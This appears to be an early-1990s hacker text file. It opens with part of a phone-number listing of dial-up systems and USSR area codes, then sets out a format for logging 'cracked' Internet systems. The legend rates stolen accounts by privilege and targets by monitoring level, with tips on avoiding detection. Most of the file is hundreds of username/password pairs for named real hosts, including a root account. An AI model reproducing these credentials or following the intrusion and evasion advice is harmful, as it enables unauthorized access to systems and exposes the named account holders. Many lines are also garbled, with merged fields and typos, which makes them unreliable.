OI = OIC lie.
CM = CMTS = Cellular Mobile Telephone System.
TT = Test Tones number. Used by Telecom tech's to measure
    the gain in a line.
RB = Ring back.
BN = Blocked Number. You will need special routing to get to
    one of these.
TE = Test number. Installed by Telecom tech's. Use ths if it
    doesn't fall under some other type of clasification.
CG = Charge Generator. Will send charging pulses in addition
    to what ever is generated by your z-point repeater. e.g
    0055 numbers.
DV = Diverter.
FX = FX.
AM = Answering machine.
EX = Extender.
RT = Rotary line.
TS = TASI line.
OO = lOOp.
      ~xx = NOT xx. e.g ~CG
     ~~xx = NOT NOT xx = xx (fundemental theorum of logic)
    xx|yy = xx OR (exclusive) yy. e.g AM|CM
    xx&yy = xx AND yy = xxyy. eg BNDL
() = order of operations e.g BN(AM|CM)

Here is an example list.


1-317-494-9400	90/12		DL	;THOR library catalog system.
;8AM-12PM Monday-Saturday,
;11AM-12PM sunday.

61'       	1991.7	Australia

61-3-008-888000	1991.6		NCFCDT	;Westpac DTMF electronic banking
;demo account un:1# pw:1#
;pw:0 - hangs up.

61-3-1818	1991.7		NCDT	;telecom telecard - automated
;calling card server.

61-3-349-1122	1991.6		DL	;2400bd Xenix, educational s/
;U:pnet, U:bbs
;U:uucp (uucico with munnari)

61-3-467-6400	1991.7		DLSV	;Philip Institute VAX server.
61-3-478-3347	1991.7		DLSV	;Latrobe Uni annex
61-3-478-9091	1991.7		DLSV	;Latrobe Uni annex
61-3-523-98651991.7	DL;Phoenix - public access sun3/20.
61-3-532-8029	1991.7		DL	;Phoenix - public access sun3/20.

61-3-663-5477	1991.7		DLSVLP	;VicNet server, many systems
;are abvailable from this server.
;the HELP facility will give you
;system names, and lots of other

61-3-820-3670	1991.7		DL	;"stkil", St Kilda exchange SSP
61-3-602-5337	1991.7		DL	;"losp1", Lonsdale St exchange SSP
61-3-602-5345	1991.7		DL	;"losp2", Lonsdale St exchange SSP
61-3-602-0253	1991.7		DL	;"losp3", Lonsdale St exchange SSP
61-3-642-0518	1991.7		DL	;"lop4", Lonsdale St exchange SSP

61-3-849-xxxx	1991.2	SD|XM	NCOO	;loop, disconnects in 90s from SD but
;not from XM. Fairly faint.

7'        	1990.1			;USSR
7-011'     	1990.1			;Kaliningrad
7-012'   	1990.1			;Vilnus
7-013'  	1990.1			;Riga
7-014'  	1990.1			;Tallinn
7-015'    	1990.1			;Grodno
7-016'    	1990.1			;Brest
7-017'    	1990.1			;Minsk
7-018'    	1990.1			;Vitebsk
7-019'    	1990.1			;Mogilev
7-020'    	1990.1			;Gomel
7-031'    	1990.1			;Uzhgorod
7-032'    	1990.1			;Lvov
7-033'    	1990.1		;Lutsk
7-034'    	1990.1			;Ivano-Frankovsk
7-036'    	1990.1			;Rovno
7-037'    	1990.1			;Chernovtsi
7-041'    	1990.1			;Zhitomir
7-042'    	1990.1			;Kishinev
7-043'    	1990.1			;Vinnitsa
7-044'    	1990.1			;Kiev
7-046'    	1990.1			;Chernigov
7-047'    1990.1			;Cherkassi
7-048'    	1990.1			;Odessa
7-051'    1990.1			;Nikolaev
7-052'    	1990.1			;Kirovograd
7-054'    	1990.1			;Sumi
7-056'    	1990.1			;Dnepropetrovsk
7-057'    	1990.1			;Kharkov
7-060'    	1990.1			;Yalta
7-061'    	1990.1			;Zaporozhje
7-062'   	1990.1	;Donetsk
7-064'    	1990.1			;Lugansk
7-065'    1990.1			;Simferopol
7-071'    	1990.1			;Kursk
7-072'    1990.1			;Belgorod
7-073'   	1990.1			;Voronezh
7-073'    	1990.1			;Poltava
7-074'    	1990.1			;Lipetsk
7-075'    	1990.1			;Tambov
7-081'    	1990.1	;Smolensk
7-082'    	1990.1			;Tver
7-083'    	1990.1			;Bryansk
7-084'    	1990.1			;Kaluga
7-085'    	1990.1			;Yaroslavl
7-086'    	1990.1			;Orel
7-087'    	1990.1			;Tula
7-091'    	1990.1			;Ryazan
7-092'    	1990.1			;Vladimir
7-093'    	1990.1			;Ivanovo
7-094   	1990.1			;Kostroma
7-095'    	1990.1			;Moscow
7-265'    	1990.1			;Bukhara
7-301'    	1990.1			;Ulan-Ude
7-302'    	1990.1			;Chita
7-314'    	1990.1			;Kustanai
7-317'    	1990.1			;Tsilinograd
7-321'    	1990.1			;Karaganda
7-327'    	1990.1			;Alma-Ata
7-331'    	1990.1			;Frunze
7-341'    	1990.1			;Izhevsk
7-342'    	1990.1			;Perm
7-343'    	1990.1			;Sverdlovsk
7-345'    	1990.1			;Tumen
7-347'    	1990.1			;Ufa
7-351'    	1990.1			;Chelyabinsk
7-352'    	1990.1			;Kurgan
7-353'    	1990.1			;Orenburg
7-363'    	1990.1			;Ashkhabad
7-366'    	1990.1			;Samarkand
7-367'    	1990.1			;Gulistan
7-369'    	1990.1			;Namangan
7-371'    	1990.1			;Tashkent
7-372'    	1990.1			;Dzhizak
7-373'    	1990.1			;Fergana
7-374'    	1990.1			;Andizhan
7-375'    	1990.1			;Karshi
7-376'    	1990.1			;Termez
7-377'    	1990.1			;Dushanbe
7-381'    	1990.1			;Omsk
7-382'    	1990.1			;Tomsk
7-383'    	1990.1			;Novosibirsk
7-384'    	1990.1			;Kemerovo
7-385'    	1990.1			;Barnaul
7-391'    	1990.1			;Krasnoyarsk
7-393'    	1990.1			;Irkutsk
7-411'    	190.1	;Yakutsk
7-413'    	1990.1			;Magadan
7-414'    	1990.1			;Petropavlovsk-Kamchatski
7-416'    	1990.1			;Blagoveschensk
7-421'    	1990.1			;Khabarovsk
7-423'    	1990.1			;Vladivostok
7-424'    	1990.1			;Juzhno-Sakhalinsk
7-425'    	1990.1			;Pskov
7-812'    	1990.1			;Leningrad
7-814'    	1990.1			;Petrozavodsk
7-815'    	1990.1			;Murmansk
7-816'    	1990.1			;Novgorod
7-817'    	1990.1			;Vologda
7-818'    	1990.1			;Arkhangelsk
7-821'    	1990.1			;Siktivkar
7-831'    	1990.1			;Kirov
7-831'    	1990.1			;Nizhnii Novgorod
7-834'    	1990.1			;Saransk
7-835'    	1990.1			;Cheboksari
7-836'    	1990.1			;Ioshkar-Ola
7-841'    	1990.1			;Penza
7-842'    	1990.1			;Ulyanovsk
7-843'    	1990.1			;Kazan
7-844'    	1990.1			;Volgograd
7-845'    	1990.1			;Saratov
7-846'   	1990.1	;Kuibishev
7-847'    	1990.1			;Elista
7-851'    1990.1	;Astrakhan
7-861'    	1990.1			;Krasnodar
7-862'    	1990.1			;Sochi
7-863'    	1990.1			;Rostov-na-Donu
7-865'    	1990.1			;Stavropol
7-866'    	1990.1			;Nalchik
7-867'    	199.1			;Vladikavkaz
7-871'    	1990.1			;Groznii
7-872'    	1990.1			;Makhatchkala
7-879'    	1990.1			;Pyatigorsk
7-881'    	1990.1			;Sukhumi
7-882'    	1990.1			;Batumi
7-883'    	1990.1			;Tbilisi
7-885'    	1990.1			;Erevan
7-892'    	1990.1			;Baku


[ Thak to Tax for obtaining the USSR area codes ]


                    {} The Standed Hvee Listing formats {}
                    {}                                  {}
                    {}  .  Part#2 - The InterNet format {}
                    {}      .                    .   *. {}
                    {} .   .  .        By       .  .    {}
                    {}  *    .                 .      . {}
                    {}      . The Chthonic Hvee   .     {}

Ok, here it is, with most of the InterNet systems I have cracked in
the past month and a half. Due to my problems with the Australian Federal
Police, I have removed all the *.oz.au entries.

              |Feild seperator.
              |      |The last update of this information.
              |      |
              |      |       |Feild seperator.
              |      |       |
              |      |       |    |How to activate/connect. Cf key.
              |      |       |    |
              |      |       |    |     |Feild seperator.
              |      |       |    |     |
              |      |       |    |     |   |Discribes account/system typ.
              |      |       |    |     |   |
|                                                 |     |        |
|                                                 |     |        |More comments
|                         Where [] efines an      |     |
|                         optional parameter,     |     |Primary comment feild.
|                         and {} defines an       |
|                         optional, optionally    |Feild seperator.
|                         repedative parameter.
|InterNet name/number.

-------			----	------	----	;-------

ADDRESS: Internet style address with domains.

DATE: In the yyyy.mm format

TL = Telnet protocol
RL = Rlogin protocol
FT = FTP protocol
TF = TFTP protocol
DU = Dialup Access
SD = Standed TCP/IP system = TLRAFT
EN = Encore protocol
FC = From local ntork
25 = From a packet switching network
SV = From a local server

P0 = Complete system operator priv
P1 = Partial operator priv
P2 = High ranking user (wheel, operator groups etc)
P3 = Standed trusted user
P4 = Average user
P5 =Standed untrusted user (most student accounts)
P6 = Restricted shell
P7 = Very restricted shell (i.e only 20 or so commands)
P8 = No shell access at all, user runs pre-defined s/w
P9 = Public P8 software
** = Password has bee changed
## = Account removed

RH = ".rhosts" accounts on selected hosts
YP = System is running NIS.
PY = Account NOT on the YP list (if any).
AJ = Shadow Password file.
SH = Shell access
SW = Account is captive to some form of software/database
PA = ulic Access.
OD = Outdial
UU = system A->system B, account. Runs uucico
IN = In/out. ACSnet servers, etc.
CU = Unix cu/tip outdial on this account
25 = Can create PSS X.25 connections (PAD)
29 = Can create PSS X.29 connections (PAD)
SV = Server of sme sort (e.g an Annex box)
GA = Gateway. A gateway is an unrestricted server.

S0 = The ultimate in paranoia. e.g NSA. Be *very* careful
S1 = Very high security/monitering i.e military installations
    not directly connected to the internet. i.e the
    account *will* die n a 15 minutes if you do not take
    the time to appear completely normal.
S2 = High security. All connections loged, auto-auditing
    software. e.g a VMS is high-defence mode at a defence
    contractor's site.
S3 = Good security. Small number of wellknown users, system
    may have had experiances with hackers before. The
    system logs are checked daily. If it appears you called
    from another country, the account will probably die.
    the next day. e.g A workstation at a small s/w company.
S4 = Better than average security, extended activity will
    be knowticed. e.g a mainframe at BHP with 800 users.
S5 = Normal security.
S6 = Loose security. e.g most systems with over a 1000 users
                    or educational systems.
S7 = Very loose security. e.g very, very big sites, or
    systems that no one cares about.
    (This list is one of EFFECTIVE security. A large uni
     probably has some of the strongest security around,
                     but there are so many users it becomes impossible to
     examine each one.)
S8 = Pathetic, dreadful. On one of these systems, you can
    set up 10 password sprinters, come back in 3 weeks, and
                    they will _still_ be happily permutating away.
S9 = If ever you find something worce than a S8 (?)
HK= The operator/local net is "out to get" hackers.
CP = CPU overuse limiting installed. God I hate these things.
LC = LastComm. All commands are logged.
AU = Strong auditing software active. e.g a VAX/VMS set up
    correctly. Thi doesn't imply that anyone actually
    looks at the bloody output though.

-------			----	------	----	-------
{start}       	1991.7		SV	;(TELNET: ENTER ATTACH COMMAND)
;(military system) 	1991.6	FC		;U:studentb P:studentb (evol4)      	1991.7			;U:aburdene P:raindrop
; (vax 11/780)

acsc.acsc.com   	1991.7		AJ	;U:news P:news
acsc.acsc.com		1991.7		AJ	;U:usenet P:usenet
acsc.acsc.com		1991.7		AJ	;U:phil P:phil
acsc.acsc.com		1991.7		AJ	;U:celia P:celia
acsc.acsc.com		1991.7		AJ	;U:rc P:rc
acsc.acsc.com		1991.7		AJ	;U:kompella P:kompella

apollo.bucknell.edu	1991.7		S8P0	;U:subv P:subversive
apollo.bucknell.edu	1991.7		S8	;U:user4 P:user4
apollo.bucknell.edu	1991.7		S8	;U:user2 P:user2
apollo.bucknell.edu	1991.7		S8	;U:user1 P:user1
apollo.buckell.edu1991.7		S8	;U:user3 P:user3
apollo.bucknell.edu	1991.7		S8	;U:user5 P:user5
apollo.bucknell.edu	1991.7		S8	;U:amwake P:wizard
apollo.bucknell.edu	1991.7		S8	;U:burritt P:prince
apollo.bucknell.edu	1991.7		S8	;U:lorenzo P:user
apollobucknell.edu	1991.7		S8;U:klemen P:spring
apollo.bucknell.edu	1991.7		S8	;U:dunn P:summer
apollo.bucknell.edu	1991.7		S8	;U:mccain P:raindrop
apollo.bucknell.edu1991.7		S8	;U:tang P:subway
apollo.bucknell.edu	1991.7		S8	;U:mccarvll P:summer
apollo.bucknell.edu	1991.7		S8	;U:cmb P:cardinal
apollo.bucknell.edu	19917	S8;U:tezcan P:user
apollo.bucknell.edu	1991.7		S8	;U:shaulis P:success
apollo.bucknell.edu	1991.7		S8	;U:reikert P:user
apollo.bucknell.edu	1991.7		S8	;U:bcook P:knight
apollo.bucknell.edu	1991.7		S8	;U:jarden P:knight
apollo.bcknell.edu	1991.7		S8	;U:pizzi P:wizard
apollo.bucknell.edu	1991.7		S8	;U:siebnchr P:cooper
apollo.bucknell.edu	1991.7		S8	;U:dinehart P:user
apollo.bucknell.edu	1991.7		S8	;U:weikert P:wizard
apollo.bucknell.edu	1991.7		S8	;U:allmen P:december
apollo.bucknell.edu	1991.7		S8	;U:sigtrmns P:knight
apollo.bucknell.eu	1991.7		S8	;U:nishimto P:december
apollo.bucknell.edu	1991.7		S8	;U:lincoln P:user
apollo.bucknell.edu	1991.7		S8	;U:kofron P:user
apollo.bucknell.edu	1991.7		S8	;U:kaiser P:december
apollo.bucknell.edu	1991.7		S8	;U:engle P:sumer
apollo.bucknell.edu	1991.7		S8	;U:streeper P:prince
apollo.bucknell.edu	1991.7		S8	;U:reichart P:user
apollo.bucknell.edu	1991.7		S8	;U:love P:cooper
apollo.bucknell.edu	1991.7		S8	;U:swartz P:raindrop
apollo.bucknell.edu	1991.7		S8	;U:epifanio P:prince
apollo.bucknell.edu	1991.7		S8	;U:collins P:user
apollo.bucknell.edu	1991.7		S8	;U:rhodes P:prince
apollo.bucknell.edu	1991.7		S8	;U:ssmith P:user
apollo.bucknell.edu	1991.7		S8	;U:shah P:knight
apollo.bucknell.edu	1991.7		S8	;U:pinter P:user
apollo.bucknell.edu	1991.7		S8	;U:murgolo P:wizard
apollo.bucknell.edu	1991.7		S8	;U:korfron P:user
apollo.bucknell.edu	1991.7		S8	;U:noaker P:unicorn
apollo.bucknell.edu	1991.7		S8	;U:younkin P:user
apollo.bucknell.edu	1991.7		S8	;U:detweilr P:prince
apollo.bucknell.edu	1991.7		S8	;U:jbenton P:paddle
apollo.bucknell.edu	1991.7		S8	;U:mcampbll P:twilight
apollo.bucknell.edu	1991.7		S8	;U:rosebrgh P:sleep
apollo.bucknell.edu	1991.7		S8;U:knisely P:respite
apollo.bucknell.edu	1991.7		S8	;U:grassley P:happy
apollo.bucknell.edu	1991.7		S8	;U:stanojvc P:ketch
apollo.bucknell.edu	1991.7		S8	;U:masanay P:bluebird
apollo.bucknell.edu	1991.7		S8	;U:cooley P:bluebird
apollo.bucknell.edu	1991.7		S8	;U:melick P:kazoo
apollo.bucknell.edu	1991.7		S8	;U:ioppolo P:liberty
apollo.bucknell.edu	1991.7		S8	;U:hollenbaugh P:october
apollo.bucknell.edu	1991.7		S8	;U:biggert P:opera
apollo.bucknell.edu	1991.7		S8	;U:blumnfld P:electric
apollo.bucknell.edu	1991.7		S8	;U:karp P:viking
apollo.bucknell.edu	1991.7		S8	;U:crane P:provoke
apollo.bucknell.edu	1991.7		S8	;U:balent P:several
apollo.bucknell.edu	1991.7		S8	;U:spiegel P:inferno
apollo.bucknell.edu1991.7		S8	;U:ekulkamt P:pundit
apollo.bucknell.edu	1991.7		S8	;U:rlewis P:chess
apollo.bucknell.edu	1991.7		S8	;U:jbaker P:bison
apollo.bucknell.edu	1991.7		S8	;U:zeiler P:freeze
apollo.bucknell.edu	1991.7		S8	;U:lawrence P:silvr
apollo.bucknell.edu	1991.7		S8	;U:petasis P:marina
apollo.bucknell.edu1991.7		S8	;U:willimsn P:uproot
apollo.bucknell.edu	1991.7		S8	;U:case P:elevate
apollo.bucknell.edu	1991.7		S8	;U:shaver P:dante
apollo.bucknell.edu	1991.7		S8	;U:finney P:soiree
apollo.bucknell.edu	1991.7		S8	;U:heleen P:freeze
apollobcknell.edu1991.7		S8;U:yunshi P:collier
apollo.bucknell.edu	1991.7		S8	;U:bwilson P:ragweed
apollo.bucknell.edu	1991.7		S8	;U:jhaggrty P:parapet
apollo.bucknell.edu	1991.7		S8	;U:murtha P:schooner
apollo.bucknell.edu	1991.7		S8	;U:wigger P:collier
apollo.bucknell.edu	1991.7		S8	;U:retallck P:railroad
apollo.bucknell.edu1991.7		S8	;U:dabulis P:argonaut
apollo.bucknell.edu1991.7		S8	;U:joy P:keelson
apollo.bucknell.edu	1991.7		S8	;U:patkus P:snowfall
apollo.bucknell.edu	1991.7		S8	;U:gilmore P:stereo
apollo.bucknell.edu	1991.7		S8	;U:ladnslgr P:saddle
apollo.bucknell.edu	1991.7		S8	;U:hamlin P:privy
apollo.bucknell.edu	1991.7		S8	;U:guiliano P:tuesday
apollo.bucknell.edu	1991.7		S8	;U:jhirnesn P:spoke
apollo.bucknell.edu	1991.7		S8	;U:decastro P:rowboat
apollo.bucknell.edu	1991.7		S8	;U:youtz P:tuesday
apollo.bucknell.edu	1991.7		S8	;U:moffitt P:pauper
apollo.bucknell.edu	1991.7		S8	;U:viands P:opera
apollo.bucknell.edu	1991.7		S8	;U:laplante P:svelte
apollo.bucknell.edu	1991.7		S8	;U:fralick P:lydia
apollo.bucknell.edu	1991.7		S8	;U:trainor P:snowfall
apollo.bucknell.edu	1991.7		S8	;U:naski P:price
apollo.bucknell.edu	1991.7		S8U:bernabeo P:paddle
apollo.bucknell.edu	1991.7		S8	;U:hildick P:soiree
apollo.bucknell.edu1991.7		S8	;U:besz P:maria
apollo.bucknell.edu	1991.7		S8	;U:baiocco P:several
apollo.bucknell.edu	1991.7		S8	;U:sutfin P:giraffe
apollo.bucknell.edu	1991.7		S8	;U:smolskis P:winch
apollo.bucknell.edu	1991.7		S8	;U:sullivan P:albi
apollo.bucknell.edu	1991.7		S8	;U:radecki P:violin
apollo.bucknell.edu	1991.7		S8	;U:lhamiltn P:uproot
apollo.bucknell.edu	1991.7		S8	;U:khuu P:friday
apollo.bucknell.edu	1991.7		S8	;U:sonthemr P:ketch
apollo.bucknell.edu	1991.7		S8	;U:miyamoto P:grand
apollo.bucknell.edu	1991.7		S8	;U:bbrubakr Psnowfall
apollo.bucknell.edu	1991.7		S8	;U:ajones P:spool
apollo.bucknell.edu	1991.7		S8	;U:burroghs P:swallow
apollo.bucknell.edu	1991.7		S8	;U:skline P:elevate
apollo.bucknell.edu	1991.7		S8	;U:peterson P:switch
apollo.bucknell.edu	1991.7		S8	;U:alvarez P:tuesday
apollo.bucknell.edu	1991.7		S8	;U:kennedy P:colier
apollo.bucknell.edu	1991.7		S8	;U:ince P:svelte
apollo.bucknell.edu	1991.7		S8	;U:haytaian P:snowfall
apollo.bucknell.edu	1991.7		S8	;U:lau P:violin
apollo.bucknell.edu	1991.7		S8	;U:chaggrty P:pirate
apollo.bucknell.edu	191.7	S8;U:borch P:hurrican
apollo.bucknell.edu	1991.7		S8	;U:cartwright P:carol
apollo.bucknell.edu	1991.7		S8	;U:kkerr P:belfry
apollo.bucknell.edu	1991.7		S8	;U:trout P:wheel
apollo.bucknell.edu	1991.7		S8	;U:bright P:resolve
apollo.bucknell.edu	1991.7		S8	;U:stegmeir P:tuesday
apollo.bucknell.edu	1991.7		S8	;U:lleby P:leopard
apollo.bucknell.edu	1991.7		S8	;U:wilke P:rowboat
apollo.bucknell.edu	1991.7		S8	;U:herman P:hoover
apollo.bucknell.edu	1991.7		S8	;U:mpowell P:aztec
apollo.bucknell.edu	1991.7		S8	;U:sandler P:lucky
apollo.bucknell.edu	191.7		S8	;U:zaybekin P:wipsaw
apollo.bucknell.edu	1991.7		S8	;U:kgoodlng P:winch
apollo.bucknell.edu	1991.7		S8	;U:jmurray P:saddle
apollo.bucknell.edu	1991.7		S8	;U:dehoward P:queen
apollo.bucknell.edu	1991.7		S8	;U:spriggle P:silver
apollo.bucknell.edu	1991.7		S8	;U:twhite P:stereo
apollo.bucknell.edu	1991.7		S8	;U:wconnors P:belfry
apollo.bucknell.edu	1991.7		S8	;U:jacobson P:february
apollo.bucknell.edu	1991.7		S8	;U:gentzler P:friday
apollo.bucknell.edu	1991.7		S8	;U:sbooth P:queen
apollo.bucknell.edu	1991.7		S8	;U:fischer P:cactus
pollo.bucknell.edu	1991.7		S8	;U:malikkal P:wallaby
apollo.bucknell.edu	1991.7		S8	;U:fulmer P:ballroom
apollo.bucknell.edu	1991.7		S8	;U:leiphart P:dante
apollo.bucknell.edu	1991.7		S8	;U:mueller P:paddle
apollo.bucknell.edu	1991.7		S8	;U:siller P:sword
apollo.bucknell.edu	1991.7		S8	;U:hartman P:saturday
apollo.bucknell.edu	1991.7		S8	;U:hoke P:alibi
apollo.bucknell.edu	1991.7		S8	;U:hummell P:tallyho
apollo.bucknell.edu	1991.7		S8	;U:mardula P:queen
apollo.bucknell.edu	1991.7		S8	;U:fryer P:wallaby
apollo.bucknell.edu	1991.7		S8	;U:bush P:rocky
apollo.bucknell.edu	1991.7		S8	;U:hostettr P:purple
apollo.bucknell.edu	1991.7		S8	;U:rross P:respite
apollo.bucknell.edu	1991.7		S8	;U:dehart P:queen
apollo.bucknell.edu	1991.7		S8	;U:mccarthy P:ketch
apollo.bucknell.edu	1991.7S8	;U:noll P:snowfall
apollo.bucknell.edu	1991.7		S8	;U:dewald P:whipsaw
apollo.bucknell.edu	1991.7		S8	;U:klynch P:china
apollo.bucknell.edu	1991.7		S8	;U:troxel P:whipsaw
apollo.bucknell.edu	1991.7		S8	;U:snyder P:sabra
apollo.bucknell.edu	1991.7		S8	;U:greiner P:collier
apollo.bucknell.edu	1991.7		S8	;U:srdi P:parapet
apollo.bucknell.edu	1991.7		S8	;U:peyton P:bluebird
apollo.bucknell.edu	1991.7		S8	;U:ychen P:parapet
apollo.bucknell.edu	1991.7		S8	;U:hata P:spider
apollo.bucknell.edu	1991.7		S8	;U:weigle P:resolve
apollo.bucknell.edu	1991.7		S8	;U:galbrath P:schooner
apollo.bucknell.edu191.7	S8;U:sambasvm P:alibi
apollo.bucknell.edu	1991.7		S8	;U:aspr83 P:demon
apollo.bucknell.edu	1991.7		S8	;U:hirneisn P:pauper
apollo.bucknell.edu	1991.7		S8	;U:bendele P:capstan
apollo.bucknell.edu	1991.7		S8	;U:travalia P:february
apollo.bucknell.edu	1991.7		S8	;U:jkmiller P:lance
apollo.bucknell.edu	1991.7		S8;U:stryker P:robin
apollo.bucknell.edu	1991.7		S8	;U:laughlin P:swallow
apollo.bucknell.edu	1991.7		S8	;U:jacobs P:pundit
apollo.bucknell.edu	1991.7		S8	;U:vogel P:bison
apollo.bucknell.edu	1991.7		S8	;U:draymond P:whistle
apollo.buckell.edu1991.7		S8;U:kosiavln P:belfry
apollo.bucknell.edu	1991.7		S8	;U:hoyt P:crystal
apollo.bucknell.edu	1991.7		S8	;U:fullmer P:ballroom
apollo.bucknell.edu	1991.7		S8	;U:spiglmyr P:october
apollo.bucknell.edu	1991.7		S8	;U:mtgay P:freeze
apollo.bucknell.edu	1991.7		S8	;U:hurley P:january
apollo.bucknell.edu	1991.7		S8	;U:kosvitch P:swift
apollo.bucknell.edu	1991.7		S8	;U:bldow P:cactus
apollo.bucknell.edu	1991.7		S8	;U:edgar P:lance
apollo.bucknell.edu	1991.7		S8	;U:hiltz P:winch
apollo.bucknell.edu	1991.7		S8	;U:barrick P:snowfall
apollo.bucknell.edu	1991.7		S8	;U:bmccrmck P:squeal
apollo.bucknell.edu	1991.7		S8	;U:shawah P:ragweed
apollo.bucknell.edu	1991.7		S8	;U:ford P:edward
apollo.bucknell.edu	1991.7		S8	;U:schild P:gorgon
apollo.bucknell.edu	1991.7		S8	;U:simonan P:winch
apollo.bucknell.edu	1991.7		S8	;U:coppingr P:several
apollo.bucknell.edu	1991.7		S8	;U:headley P:trefoil
apollo.bucknell.edu	1991.7		S8	;U:jewell P:cactus
apollo.bucknell.edu	1991.7		S8	;U:zaiser P:pepsi
apollo.bucknell.edu	1991.7		S8	;U:dmiller P:dagger
apollo.bucknell.edu	1991.7		S8	;U:stark P:prairie
apollo.bucknell.edu	1991.7		S8	;U:dworshak P:parapet
apollo.bucknell.edu	1991.7		S8	;U:moyer P:respite
apollo.bucknell.edu	1991.7		S8	;U:swanson P:opera
apollo.bucknell.edu	1991.7		S8	;U:handlan P:april
apollo.bucknell.edu	1991.7		S8	;U:holmes P:october
apollo.bucknell.edu	1991.7		S8	;U:berelson P:firefly
apollo.bucknell.edu	1991.7		S8	;U:mayer P:august
apollo.bucknell.edu	1991.7		S8	;U:thacher P:dante
apollo.bucknell.edu	1991.7		S8	;U:patoir P:swallow
apollo.bucknell.edu	1991.7		S8	;U:mcgray P:ketch
apollo.bucknell.edu	1991.7		S8	;U:dretar P:dovetail
apollo.bucknell.edu	1991.7		S8	;U:choffman P:gemini
apollo.bucknell.edu	1991.7		S8	;U:wealand P:volley
apollo.bucknell.edu	1991.7		S8	;U:brovero P:peruse
apollo.bucknell.edu	1991.7		S8	;U:midgette P:dovetail
apollo.bucknell.edu	1991.7		S8	;U:tsmith P:mirage
apollo.bucknell.edu	1991.7S8	;U:toombs P:resolve
apollo.bucknell.edu	1991.7		S8	;U:luecke P:icicle
apollo.bucknell.edu	1991.7		S8	;U:saffle P:parapet
apollo.bucknell.edu	1991.7		S8	;U:rowlands P:whipsaw
apollo.bucknell.edu	1991.7		S8	;U:jcnnnghm P:whipsaw
apollo.bucknell.edu	1991.7		S8	;U:chilton P:dagger
apollo.bucknell.edu	1991.7		S8	;U:kelly P:firefly
apollo.bucknell.edu	1991.7		S8	;U:schultze P:winch
apollo.bucknell.edu	1991.7		S8	;U:mead P:jerry
apollo.bucknell.edu	1991.7		S8	;U:sptzmllr P:august
apollo.bucknell.edu	1991.7		S8	;U:neff P:winch
apollo.buckell.edu	1991.7	S8	;U:smsmith P:ozone
apollo.bucknell.edu	1991.7		S8	;U:gessner P:respite
apollo.bucknell.edu	1991.7		S8	;U:jhhsu P:viking
apollo.bucknell.edu	1991.7		S8	;U:clay P:hurrah
apollo.bucknell.edu	1991.7		S8	;U:benson P:january
apollo.bucknell.edu	1991.7		S8	;U:brandick P:parapet
apollo.bucknell.edu	1991.7		S8	;U:johnson P:pirate
apollo.bucknell.edu	1991.7		S8	;U:dibrnrdo P:rowboat
apollo.bucknell.edu	1991.7		S8	;U:carroll P:provoke
apollo.bucknell.edu	1991.7		S8	;U:hauser P:paddle
apollo.bucknell.edu	1991.7		S8	;U:horan P:winch
apollo.bucnell.edu	1991.7		S8	;U:hacknbrg P:sunday
apollo.bucknell.edu	1991.7		S8	;U:emery P:trefoil
apollo.bucknell.edu1991.7		S8	;U:hutchison P:della
apollo.bucknell.edu	1991.7		S8	;U:post P:february
apollo.bucknell.edu	1991.7		S8	;U:hanyak P:molly
apollo.bucknell.edu	1991.7		S8	;U:small P:aztec
apollo.bucknell.edu	1991.7		S8	;U:amiller P:spool
apollo.bucknell.edu	1991.7		S8	;U:kerprich P:siege
apollo.bucknell.edu	1991.7		S8	;U:dbell P:parapet
apollo.bucknell.edu	1991.7		S8	;U:druck P:saddle
apollo.bucknell.edu	1991.7		S8	;U:shedlski P:quail
apoll.bucknell.edu1991.7		S8	;U:reddig P:sunday
apollo.bucknell.edu	1991.7		S8	;U:hickey P:price
apollo.bucknell.edu	1991.7		S8	;U:burgess P:elevate
apollo.bucknell.edu	1991.7		**S8	;U:ream P:spool
apollo.bucknell.edu	1991.7		S8	;U:hurley.caedsg P:anuary
apollo.bucknell.edu	1991.7		S8	;U:ggreiner P:respite
apollo.bucknell.edu1991.7		S8	;U:walters P:corvette
apollo.bucknell.edu	1991.7		S8	;U:carson P:svelte
apollo.bucknell.edu	1991.7		S8	;U:slupe P:parapet
apollo.bucknell.edu	1991.7		S8	;U:falla P:spool
apollo.bucknell.edu	1991.7		S8	;U:herrema P:several
apollo.bucknell.edu	1991.7		S8	;U:olik P:railroad
apollo.bucknell.edu	1991.7		S8	;U:mullen P:midnight
apollo.bucknell.edu	1991.7		S8	;U:baish P:china
apollo.bucknell.edu	1991.7		S8	;U:nowland P:pirate
apollo.bucknell.edu	1991.7		S8	;U:lynn P:surfeit
apollo.bucknell.edu	1991.7		S8	;U:mannio P:peruse
apollo.bucknell.edu	1991.7		S8	;U:jellis P:gemini
apollo.bucknell.edu	1991.7	S8	;U:whong P:desert
apollo.bucknell.edu	1991.7		S8	;U:capaldi P:halibut
apollo.bucknell.edu	1991.7		S8	;U:smithsu P:pancake
apollo.bucknell.edu	1991.7		S8	;U:booth P:monday
apollo.bucknell.edu	1991.7		**S8P0	;U:root P:goldfinch
apollo.bucknell.edu	1991.7		S8	;U:rhen P:bluebird
apollo.bucknell.edu	1991.7		S8	;U:ahrens P:quail
apollo.bucknell.edu	1991.7		S8	;U:nurnbrgr P:ragweed
apollo.bucknell.edu	1991.7		S8	;U:vanzantn P:antenna
apollo.bucknell.edu	1991.7		S8;U:system P:towhee
apollo.bucknell.edu	1991.7		S8	;U:evans P:grand
apollo.bucknell.edu	1991.7		S8	;U:lesher P:corvette
apollo.bucknell.edu	1991.7		S8	;U:dandersn P:inferno
apollo.bucknell.edu	1991.7		S8	;U:stuntz P:dante
apollo.bucknell.edu	1991.7		S8	;U:moses P:dante
apollo.bucknell.edu	1991.7		S8	;U:hudacek P:logan
apollo.bucknell.edu	1991.7		S8	;U:hall P:peruse
apollo.bucknell.edu	1991.7		S8	;U:bontempo P:friday
apollo.bucknell.edu	1991.7		S8	;U:sturhan P:pique
apollo.bucknell.edu	1991.7		S8	;U:sophylu P:dante
apollo.bucknell.edu991.7S8	;U:kapp P:tallyho
apollo.bucknell.edu	1991.7		S8	;U:burkhrdt P:smoky
apollo.bucknell.edu	1991.7		S8	;U:fajen P:theseus
apollo.bucknell.edu	1991.7		S8	;U:zivitz P:elevate
apollo.bucknell.edu	1991.7		S8	;U:thul P:duffy
apollo.bucknell.edu	1991.7		S8	;U:plocek P:svelte
apollo.bucknell.edu	1991.7		S8	;U:cdaniels P:pauper
apollo.bucknell.edu	1991.7		S8	;U:marchand P:violin
apollo.bucknell.edu	1991.7		S8	;U:shimazu P:privy
apollo.bucknell.edu	1991.7		S8	;U:jaykim P:halibut
apollo.bucknell.edu	1991.7		S8	;U:donaldsn P:parapet
apollo.buckell.edu1991.7		S8;U:becker P:chime
